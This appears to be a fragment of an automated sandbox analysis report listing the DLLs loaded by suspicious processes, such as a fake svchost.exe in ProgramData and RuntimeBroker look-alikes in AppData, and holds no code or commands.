                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: secur32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: dxgidebug.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: sfc_os.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: dwmapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: riched20.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: usp10.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: msls31.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: windowscodecs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: textinputframework.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: coreuicomponents.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: pcacli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exeSection loaded: msasn1.dll
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: vcruntime140.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: version.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptsp.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: python3.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libffi-7.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: sqlite3.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: iphlpapi.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libcrypto-1_1.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libssl-1_1.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: mswsock.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dnsapi.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: rasadhlp.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: fwpuclnt.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msasn1.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: avicap32.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msvfw32.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmm.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmm.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: uxtheme.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dciman32.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: winmmbase.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: mmdevapi.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: devobj.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: ksuser.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: avrt.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: audioses.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: powrprof.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: umpdc.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msacm32.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: midimap.dll
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dpapi.dll
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: version.dll
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: vcruntime140.dll
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptsp.dll
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: version.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: dxgidebug.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: sfc_os.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: dwmapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: riched20.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: usp10.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: msls31.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: dpapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: windowscodecs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: textshaping.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: textinputframework.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: coreuicomponents.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: coremessaging.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: ntmarta.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: wintypes.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: wldp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: propsys.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: profapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: edputil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: urlmon.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: iertutil.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: srvcli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: appresolver.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: bcp47langs.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: slc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: userenv.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: sppc.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: pcacli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: mpr.dll
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI76842\s.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: version.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: dxgidebug.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sfc_os.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sspicli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: uxtheme.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: dwmapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: riched20.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: usp10.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: msls31.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windowscodecs.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: textinputframework.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coreuicomponents.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: ntmarta.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: coremessaging.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windows.storage.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: wldp.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: propsys.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: profapi.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: edputil.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: urlmon.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: iertutil.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: srvcli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: netutils.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: policymanager.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: msvcp110_win.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: appresolver.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: bcp47langs.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: slc.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: userenv.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: sppc.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: pcacli.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
